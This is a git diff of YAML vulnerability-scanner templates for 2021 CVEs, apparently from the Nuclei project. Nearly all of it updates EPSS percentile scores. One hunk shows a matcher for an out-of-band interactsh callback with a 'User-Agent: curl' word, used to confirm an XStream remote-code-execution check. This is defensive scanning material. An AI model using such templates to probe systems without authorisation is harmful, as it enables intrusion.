a/http/cves/2021/CVE-2021-36580.yaml b/http/cves/2021/CVE-2021-36580.yaml index 994379957e..616cd0fe05 100644 --- a/http/cves/2021/CVE-2021-36580.yaml +++ b/http/cves/2021/CVE-2021-36580.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-36580 cwe-id: CWE-601 epss-score: 0.00212 - epss-percentile: 0.58973 + epss-percentile: 0.59005 cpe: cpe:2.3:a:icewarp:icewarp_server:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-36748.yaml b/http/cves/2021/CVE-2021-36748.yaml index 6bf92359b0..7cddaba1f7 100644 --- a/http/cves/2021/CVE-2021-36748.yaml +++ b/http/cves/2021/CVE-2021-36748.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-36748 cwe-id: CWE-89 epss-score: 0.0061 - epss-percentile: 0.76291 + epss-percentile: 0.76312 cpe: cpe:2.3:a:prestahome:blog:*:*:*:*:*:prestashop:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-36749.yaml b/http/cves/2021/CVE-2021-36749.yaml index c7d35f0d80..49afe4f107 100644 --- a/http/cves/2021/CVE-2021-36749.yaml +++ b/http/cves/2021/CVE-2021-36749.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-36749 cwe-id: CWE-863 epss-score: 0.93858 - epss-percentile: 0.98872 + epss-percentile: 0.98873 cpe: cpe:2.3:a:apache:druid:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-36873.yaml b/http/cves/2021/CVE-2021-36873.yaml index 586fc5da42..53b610f1c7 100644 --- a/http/cves/2021/CVE-2021-36873.yaml +++ b/http/cves/2021/CVE-2021-36873.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-36873 cwe-id: CWE-79 epss-score: 0.00131 - epss-percentile: 0.47788 + epss-percentile: 0.478 cpe: cpe:2.3:a:webence:iq_block_country:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-37216.yaml b/http/cves/2021/CVE-2021-37216.yaml index 592e6e6149..7553cb87c8 100644 --- a/http/cves/2021/CVE-2021-37216.yaml +++ b/http/cves/2021/CVE-2021-37216.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-37216 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42964 + epss-percentile: 0.42988 cpe: cpe:2.3:o:qsan:xn8024r_firmware:3.1.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-37304.yaml b/http/cves/2021/CVE-2021-37304.yaml index 44359b595d..5312d89505 100644 --- a/http/cves/2021/CVE-2021-37304.yaml +++ b/http/cves/2021/CVE-2021-37304.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-37304 cwe-id: CWE-732 epss-score: 0.01241 - epss-percentile: 0.83971 + epss-percentile: 0.8398 cpe: cpe:2.3:a:jeecg:jeecg:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-37305.yaml b/http/cves/2021/CVE-2021-37305.yaml index 8b007e33dd..3fba2e8d65 100644 --- a/http/cves/2021/CVE-2021-37305.yaml +++ b/http/cves/2021/CVE-2021-37305.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-37305 cwe-id: CWE-732 epss-score: 0.00272 - epss-percentile: 0.64376 + epss-percentile: 0.64411 cpe: cpe:2.3:a:jeecg:jeecg:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-37416.yaml b/http/cves/2021/CVE-2021-37416.yaml index 85044e8b6f..545a38a15d 100644 --- a/http/cves/2021/CVE-2021-37416.yaml +++ b/http/cves/2021/CVE-2021-37416.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-37416 cwe-id: CWE-79 epss-score: 0.00118 - epss-percentile: 0.45596 + epss-percentile: 0.45608 cpe: cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-37538.yaml b/http/cves/2021/CVE-2021-37538.yaml index 09b34b0474..915ab69317 100644 --- a/http/cves/2021/CVE-2021-37538.yaml +++ b/http/cves/2021/CVE-2021-37538.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-37538 cwe-id: CWE-89 epss-score: 0.02263 - epss-percentile: 0.88401 + epss-percentile: 0.88405 cpe: cpe:2.3:a:smartdatasoft:smartblog:*:*:*:*:*:prestashop:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-37573.yaml b/http/cves/2021/CVE-2021-37573.yaml index 4c6f9cbdd7..f027bb57ac 100644 --- a/http/cves/2021/CVE-2021-37573.yaml +++ b/http/cves/2021/CVE-2021-37573.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-37573 cwe-id: CWE-79 epss-score: 0.00303 - epss-percentile: 0.66269 + epss-percentile: 0.66303 cpe: cpe:2.3:a:tiny_java_web_server_project:tiny_java_web_server:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-37580.yaml b/http/cves/2021/CVE-2021-37580.yaml index 0fd2f15988..7bf888a6c0 100644 --- a/http/cves/2021/CVE-2021-37580.yaml +++ b/http/cves/2021/CVE-2021-37580.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-37580 cwe-id: CWE-287 epss-score: 0.92515 - epss-percentile: 0.987 + epss-percentile: 0.98702 cpe: cpe:2.3:a:apache:shenyu:2.3.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-37589.yaml b/http/cves/2021/CVE-2021-37589.yaml index 6ab1345e2d..8fac89f83b 100644 --- a/http/cves/2021/CVE-2021-37589.yaml +++ b/http/cves/2021/CVE-2021-37589.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-37589 cwe-id: CWE-89 epss-score: 0.0051 - epss-percentile: 0.73959 + epss-percentile: 0.73986 cpe: cpe:2.3:a:virtuasoftware:cobranca:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-37704.yaml b/http/cves/2021/CVE-2021-37704.yaml index fa18fd3ef8..24bb4f3110 100644 --- a/http/cves/2021/CVE-2021-37704.yaml +++ b/http/cves/2021/CVE-2021-37704.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-37704 cwe-id: CWE-668,CWE-200 epss-score: 0.00282 - epss-percentile: 0.6502 + epss-percentile: 0.65056 cpe: cpe:2.3:a:phpfastcache:phpfastcache:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-37833.yaml b/http/cves/2021/CVE-2021-37833.yaml index fbd3f5f40a..ff30b6d2f5 100644 --- a/http/cves/2021/CVE-2021-37833.yaml +++ b/http/cves/2021/CVE-2021-37833.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-37833 cwe-id: CWE-79 epss-score: 0.0009 - epss-percentile: 0.37778 + epss-percentile: 0.37791 cpe: cpe:2.3:a:digitaldruid:hoteldruid:3.0.2:*:*:*:*:*:*:* metadata: max-request: 4 diff --git a/http/cves/2021/CVE-2021-38314.yaml b/http/cves/2021/CVE-2021-38314.yaml index a8949909c7..0d696bbf3d 100644 --- a/http/cves/2021/CVE-2021-38314.yaml +++ b/http/cves/2021/CVE-2021-38314.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-38314 cwe-id: CWE-916,CWE-200 epss-score: 0.00153 - epss-percentile: 0.51473 + epss-percentile: 0.51496 cpe: cpe:2.3:a:redux:gutenberg_template_library_\&_redux_framework:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-38540.yaml b/http/cves/2021/CVE-2021-38540.yaml index cf441b599a..f5c64bd28f 100644 --- a/http/cves/2021/CVE-2021-38540.yaml +++ b/http/cves/2021/CVE-2021-38540.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-38540 cwe-id: CWE-306,CWE-269 epss-score: 0.00588 - epss-percentile: 0.75853 + epss-percentile: 0.75875 cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-38702.yaml b/http/cves/2021/CVE-2021-38702.yaml index af2b968f9a..6731b28994 100644 --- a/http/cves/2021/CVE-2021-38702.yaml +++ b/http/cves/2021/CVE-2021-38702.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-38702 cwe-id: CWE-79 epss-score: 0.0076 - epss-percentile: 0.7909 + epss-percentile: 0.79099 cpe: cpe:2.3:o:cyberoamworks:netgenie_c0101b1-20141120-ng11vo_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-38704.yaml b/http/cves/2021/CVE-2021-38704.yaml index 5390000a38..2bf4239b8a 100644 --- a/http/cves/2021/CVE-2021-38704.yaml +++ b/http/cves/2021/CVE-2021-38704.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-38704 cwe-id: CWE-79 epss-score: 0.00141 - epss-percentile: 0.49619 + epss-percentile: 0.49637 cpe: cpe:2.3:a:cliniccases:cliniccases:7.3.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-38751.yaml b/http/cves/2021/CVE-2021-38751.yaml index 409e836e8f..e944921a6f 100644 --- a/http/cves/2021/CVE-2021-38751.yaml +++ b/http/cves/2021/CVE-2021-38751.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-38751 cwe-id: CWE-116 epss-score: 0.00242 - epss-percentile: 0.61945 + epss-percentile: 0.61973 cpe: cpe:2.3:a:exponentcms:exponentcms:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-39144.yaml b/http/cves/2021/CVE-2021-39144.yaml index f22e6ee09c..1d89d66d32 100644 --- a/http/cves/2021/CVE-2021-39144.yaml +++ b/http/cves/2021/CVE-2021-39144.yaml @@ -85,4 +85,5 @@ http: part: interactsh_request words: - "User-Agent: curl" -# digest: 4a0a00473045022048ef59475249bc2fb081724ef4664f25086bd1f060192d12c6ed7ede68b8e637022100fbc4a7c40dca357a449e8370cb677ac55ff097e144feb7806c4db3082fcc23b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022048ef59475249bc2fb081724ef4664f25086bd1f060192d12c6ed7ede68b8e637022100fbc4a7c40dca357a449e8370cb677ac55ff097e144feb7806c4db3082fcc23b0:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2021/CVE-2021-39146.yaml b/http/cves/2021/CVE-2021-39146.yaml index 482d55d2c3..ff117ed3da 100644 --- a/http/cves/2021/CVE-2021-39146.yaml +++ b/http/cves/2021/CVE-2021-39146.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-39146 cwe-id: CWE-434 epss-score: 0.15366 - epss-percentile: 0.95275 + epss-percentile: 0.95274 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-39152.yaml b/http/cves/2021/CVE-2021-39152.yaml index 0ed7dcdb02..c4b6354371 100644 --- a/http/cves/2021/CVE-2021-39152.yaml +++ b/http/cves/2021/CVE-2021-39152.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-39152 cwe-id: CWE-502 epss-score: 0.00668 - epss-percentile: 0.77482 + epss-percentile: 0.77503 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-39165.yaml b/http/cves/2021/CVE-2021-39165.yaml index dc719534b4..c9a146d3d2 100644 --- a/http/cves/2021/CVE-2021-39165.yaml +++ b/http/cves/2021/CVE-2021-39165.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-39165 cwe-id: CWE-287 epss-score: 0.0389 - epss-percentile: 0.90938 + epss-percentile: 0.90943 cpe: cpe:2.3:a:chachethq:cachet:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-39211.yaml b/http/cves/2021/CVE-2021-39211.yaml index 4fa92fee79..33615d45d7 100644 --- a/http/cves/2021/CVE-2021-39211.yaml +++ b/http/cves/2021/CVE-2021-39211.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-39211 cwe-id: CWE-200,NVD-CWE-noinfo epss-score: 0.00232 - epss-percentile: 0.61186 + epss-percentile: 0.61213 cpe: cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-39226.yaml b/http/cves/2021/CVE-2021-39226.yaml index c0a583ae57..27331dfa89 100644 --- a/http/cves/2021/CVE-2021-39226.yaml +++ b/http/cves/2021/CVE-2021-39226.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-39226 cwe-id: CWE-287 epss-score: 0.92988 - epss-percentile: 0.98757 + epss-percentile: 0.98758 cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-39312.yaml b/http/cves/2021/CVE-2021-39312.yaml index faae03a8c6..d66c7a0346 100644 --- a/http/cves/2021/CVE-2021-39312.yaml +++ b/http/cves/2021/CVE-2021-39312.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-39312 cwe-id: CWE-22 epss-score: 0.06634 - epss-percentile: 0.93029 + epss-percentile: 0.93033 cpe: cpe:2.3:a:trueranker:true_ranker:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-39316.yaml b/http/cves/2021/CVE-2021-39316.yaml index 4a81c5e281..d534308e4b 100644 --- a/http/cves/2021/CVE-2021-39316.yaml +++ b/http/cves/2021/CVE-2021-39316.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-39316 cwe-id: CWE-22 epss-score: 0.38985 - epss-percentile: 0.96818 + epss-percentile: 0.9682 cpe: cpe:2.3:a:digitalzoomstudio:zoomsounds:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-39320.yaml b/http/cves/2021/CVE-2021-39320.yaml index dbe7d126c7..7c79418c89 100644 --- a/http/cves/2021/CVE-2021-39320.yaml +++ b/http/cves/2021/CVE-2021-39320.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-39320 cwe-id: CWE-79 epss-score: 0.0021 - epss-percentile: 0.58779 + epss-percentile: 0.5881 cpe: cpe:2.3:a:underconstruction_project:underconstruction:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-39322.yaml b/http/cves/2021/CVE-2021-39322.yaml index 7f718a21a7..72ccbf37e9 100644 --- a/http/cves/2021/CVE-2021-39322.yaml +++ b/http/cves/2021/CVE-2021-39322.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-39322 cwe-id: CWE-79 epss-score: 0.00234 - epss-percentile: 0.61299 + epss-percentile: 0.61327 cpe: cpe:2.3:a:cybernetikz:easy_social_icons:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-39327.yaml b/http/cves/2021/CVE-2021-39327.yaml index 9b9a7643c8..e561c3b0e3 100644 --- a/http/cves/2021/CVE-2021-39327.yaml +++ b/http/cves/2021/CVE-2021-39327.yaml @@ -17,9 +17,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2021-39327 - cwe-id: CWE-200,CWE-459 + cwe-id: CWE-459,CWE-200 epss-score: 0.1118 - epss-percentile: 0.94551 + epss-percentile: 0.94554 cpe: cpe:2.3:a:ait-pro:bulletproof_security:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 @@ -51,4 +51,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100aa587c559eb7ed52f8e88c73cbaf800a0a9a3431483ab4b3a393be3af24a0581022100bf149fc689df2ce43ab5e276db69cbdd55b20da8efc2e25ecb16d80f472446c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100aa587c559eb7ed52f8e88c73cbaf800a0a9a3431483ab4b3a393be3af24a0581022100bf149fc689df2ce43ab5e276db69cbdd55b20da8efc2e25ecb16d80f472446c2:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2021/CVE-2021-39350.yaml b/http/cves/2021/CVE-2021-39350.yaml index aebc9645ea..5f9e732606 100644 --- a/http/cves/2021/CVE-2021-39350.yaml +++ b/http/cves/2021/CVE-2021-39350.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-39350 cwe-id: CWE-79 epss-score: 0.00104 - epss-percentile: 0.42305 + epss-percentile: 0.42327 cpe: cpe:2.3:a:foliovision:fv_flowplayer_video_player:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-39433.yaml b/http/cves/2021/CVE-2021-39433.yaml index 8d95fc4598..526dc15018 100644 --- a/http/cves/2021/CVE-2021-39433.yaml +++ b/http/cves/2021/CVE-2021-39433.yaml @@ -16,7 +16,7 @@ info: cvss-score: 7.5 cve-id: CVE-2021-39433 epss-score: 0.00637 - epss-percentile: 0.76825 + epss-percentile: 0.76846 cpe: cpe:2.3:a:biqs:biqsdrive:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-39501.yaml b/http/cves/2021/CVE-2021-39501.yaml index 957beafbe9..cc4b5a4c52 100644 --- a/http/cves/2021/CVE-2021-39501.yaml +++ b/http/cves/2021/CVE-2021-39501.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-39501 cwe-id: CWE-601 epss-score: 0.00093 - epss-percentile: 0.39335 + epss-percentile: 0.3935 cpe: cpe:2.3:a:eyoucms:eyoucms:1.5.4:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-40149.yaml b/http/cves/2021/CVE-2021-40149.yaml index e81b2bbf99..c6c57623fb 100644 --- a/http/cves/2021/CVE-2021-40149.yaml +++ b/http/cves/2021/CVE-2021-40149.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-40149 cwe-id: CWE-552 epss-score: 0.00689 - epss-percentile: 0.77904 + epss-percentile: 0.77921 cpe: cpe:2.3:o:reolink:e1_zoom_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-40150.yaml b/http/cves/2021/CVE-2021-40150.yaml index 42cf63c97b..bea701aa83 100644 --- a/http/cves/2021/CVE-2021-40150.yaml +++ b/http/cves/2021/CVE-2021-40150.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-40150 cwe-id: CWE-552 epss-score: 0.01002 - epss-percentile: 0.81983 + epss-percentile: 0.81992 cpe: cpe:2.3:o:reolink:e1_zoom_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-40323.yaml b/http/cves/2021/CVE-2021-40323.yaml index 92a772b8f2..43b1e8eb38 100644 --- a/http/cves/2021/CVE-2021-40323.yaml +++ b/http/cves/2021/CVE-2021-40323.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-40323 cwe-id: CWE-94 epss-score: 0.02044 - epss-percentile: 0.87745 + epss-percentile: 0.87752 cpe: cpe:2.3:a:cobbler_project:cobbler:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-40539.yaml b/http/cves/2021/CVE-2021-40539.yaml index 2d3d409aa3..6c81dc0701 100644 --- a/http/cves/2021/CVE-2021-40539.yaml +++ b/http/cves/2021/CVE-2021-40539.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-40539 cwe-id: CWE-706 epss-score: 0.97402 - epss-percentile: 0.99898 + epss-percentile: 0.99899 cpe: cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4510:*:*:*:*:*:* metadata: max-request: 4 diff --git a/http/cves/2021/CVE-2021-40542.yaml b/http/cves/2021/CVE-2021-40542.yaml index 0ea7575c74..a61bee16b6 100644 --- a/http/cves/2021/CVE-2021-40542.yaml +++ b/http/cves/2021/CVE-2021-40542.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-40542 cwe-id: CWE-79 epss-score: 0.00643 - epss-percentile: 0.76965 + epss-percentile: 0.76986 cpe: cpe:2.3:a:os4ed:opensis:8.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-40661.yaml b/http/cves/2021/CVE-2021-40661.yaml index 386673fcc6..8f98c3ded3 100644 --- a/http/cves/2021/CVE-2021-40661.yaml +++ b/http/cves/2021/CVE-2021-40661.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-40661 cwe-id: CWE-22 epss-score: 0.0123 - epss-percentile: 0.83855 + epss-percentile: 0.83863 cpe: cpe:2.3:o:mt:ind780_firmware:7.2.10:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-40822.yaml b/http/cves/2021/CVE-2021-40822.yaml index 6285209ce4..1a3d34bf8f 100644 --- a/http/cves/2021/CVE-2021-40822.yaml +++ b/http/cves/2021/CVE-2021-40822.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-40822 cwe-id: CWE-918 epss-score: 0.71633 - epss-percentile: 0.97713 + epss-percentile: 0.97714 cpe: cpe:2.3:a:osgeo:geoserver:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-40856.yaml b/http/cves/2021/CVE-2021-40856.yaml index 454f2588b6..02bde4222b 100644 --- a/http/cves/2021/CVE-2021-40856.yaml +++ b/http/cves/2021/CVE-2021-40856.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-40856 cwe-id: CWE-706 epss-score: 0.02537 - epss-percentile: 0.89008 + epss-percentile: 0.89015 cpe: cpe:2.3:o:auerswald:comfortel_3600_ip_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-40859.yaml b/http/cves/2021/CVE-2021-40859.yaml index 05aa92bb44..85d6b6a705 100644 --- a/http/cves/2021/CVE-2021-40859.yaml +++ b/http/cves/2021/CVE-2021-40859.yaml @@ -17,7 +17,7 @@ info: cvss-score: 9.8 cve-id: CVE-2021-40859 epss-score: 0.02655 - epss-percentile: 0.89241 + epss-percentile: 0.89249 cpe: cpe:2.3:o:auerswald:compact_5500r_firmware:7.8a:build002:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-40868.yaml b/http/cves/2021/CVE-2021-40868.yaml index e176dba92c..5104f05e5e 100644 --- a/http/cves/2021/CVE-2021-40868.yaml +++ b/http/cves/2021/CVE-2021-40868.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-40868 cwe-id: CWE-79 epss-score: 0.00267 - epss-percentile: 0.64052 + epss-percentile: 0.64086 cpe: cpe:2.3:a:cloudron:cloudron:6.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-40875.yaml b/http/cves/2021/CVE-2021-40875.yaml index 8f90d688fa..d42025daf2 100644 --- a/http/cves/2021/CVE-2021-40875.yaml +++ b/http/cves/2021/CVE-2021-40875.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-40875 cwe-id: CWE-425 epss-score: 0.15751 - epss-percentile: 0.9533 + epss-percentile: 0.95329 cpe: cpe:2.3:a:gurock:testrail:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-40908.yaml b/http/cves/2021/CVE-2021-40908.yaml index 245bf98dce..3aea9498fa 100644 --- a/http/cves/2021/CVE-2021-40908.yaml +++ b/http/cves/2021/CVE-2021-40908.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-40908 cwe-id: CWE-89 epss-score: 0.02031 - epss-percentile: 0.87697 + epss-percentile: 0.87703 cpe: cpe:2.3:a:purchase_order_management_system_project:purchase_order_management_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2021/CVE-2021-40960.yaml b/http/cves/2021/CVE-2021-40960.yaml index 63bf25e429..be55d614a6 100644 --- a/http/cves/2021/CVE-2021-40960.yaml +++ b/http/cves/2021/CVE-2021-40960.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-40960 cwe-id: CWE-22 epss-score: 0.01168 - epss-percentile: 0.83399 + epss-percentile: 0.83407 cpe: cpe:2.3:a:galera:galera_webtemplate:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-40968.yaml b/http/cves/2021/CVE-2021-40968.yaml index 975ec55ab1..b63747e97a 100644 --- a/http/cves/2021/CVE-2021-40968.yaml +++ b/http/cves/2021/CVE-2021-40968.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-40968 cwe-id: CWE-79 epss-score: 0.00152 - epss-percentile: 0.51232 + epss-percentile: 0.51259 cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2021/CVE-2021-40969.yaml b/http/cves/2021/CVE-2021-40969.yaml index 54441f9310..76ff31ebb1 100644 --- a/http/cves/2021/CVE-2021-40969.yaml +++ b/http/cves/2021/CVE-2021-40969.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-40969 cwe-id: CWE-79 epss-score: 0.00152 - epss-percentile: 0.51232 + epss-percentile: 0.51259 cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2021/CVE-2021-40970.yaml b/http/cves/2021/CVE-2021-40970.yaml index 443f875ad3..82996a7b03 100644 --- a/http/cves/2021/CVE-2021-40970.yaml +++ b/http/cves/2021/CVE-2021-40970.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-40970 cwe-id: CWE-79 epss-score: 0.00152 - epss-percentile: 0.51232 + epss-percentile: 0.51259 cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2021/CVE-2021-40971.yaml b/http/cves/2021/CVE-2021-40971.yaml index 9419016687..8b698a500b 100644 --- a/http/cves/2021/CVE-2021-40971.yaml +++ b/http/cves/2021/CVE-2021-40971.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-40971 cwe-id: CWE-79 epss-score: 0.00152 - epss-percentile: 0.51232 + epss-percentile: 0.51259 cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2021/CVE-2021-40972.yaml b/http/cves/2021/CVE-2021-40972.yaml index 63a68afd8d..00148d0a7b 100644 --- a/http/cves/2021/CVE-2021-40972.yaml +++ b/http/cves/2021/CVE-2021-40972.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-40972 cwe-id: CWE-79 epss-score: 0.00152 - epss-percentile: 0.51232 + epss-percentile: 0.51259 cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2021/CVE-2021-40973.yaml b/http/cves/2021/CVE-2021-40973.yaml index e9c55b0e18..3ca7d029a7 100644 --- a/http/cves/2021/CVE-2021-40973.yaml +++ b/http/cves/2021/CVE-2021-40973.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-40973 cwe-id: CWE-79 epss-score: 0.00152 - epss-percentile: 0.51232 + epss-percentile: 0.51259 cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2021/CVE-2021-40978.yaml b/http/cves/2021/CVE-2021-40978.yaml index 31085d8032..0b10d9e2f9 100644 --- a/http/cves/2021/CVE-2021-40978.yaml +++ b/http/cves/2021/CVE-2021-40978.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-40978 cwe-id: CWE-22 epss-score: 0.04273 - epss-percentile: 0.91307 + epss-percentile: 0.91311 cpe: cpe:2.3:a:mkdocs:mkdocs:1.2.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41174.yaml b/http/cves/2021/CVE-2021-41174.yaml index 3084f72661..12cda87d70 100644 --- a/http/cves/2021/CVE-2021-41174.yaml +++ b/http/cves/2021/CVE-2021-41174.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-41174 cwe-id: CWE-79 epss-score: 0.96462 - epss-percentile: 0.99434 + epss-percentile: 0.99433 cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41192.yaml b/http/cves/2021/CVE-2021-41192.yaml index 8d2635ca6c..82e0654006 100644 --- a/http/cves/2021/CVE-2021-41192.yaml +++ b/http/cves/2021/CVE-2021-41192.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-41192 cwe-id: CWE-1188 epss-score: 0.00805 - epss-percentile: 0.79807 + epss-percentile: 0.79818 cpe: cpe:2.3:a:redash:redash:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-41266.yaml b/http/cves/2021/CVE-2021-41266.yaml index ce93fb8b9d..0573c25263 100644 --- a/http/cves/2021/CVE-2021-41266.yaml +++ b/http/cves/2021/CVE-2021-41266.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-41266 cwe-id: CWE-306 epss-score: 0.04636 - epss-percentile: 0.91652 + epss-percentile: 0.91662 cpe: 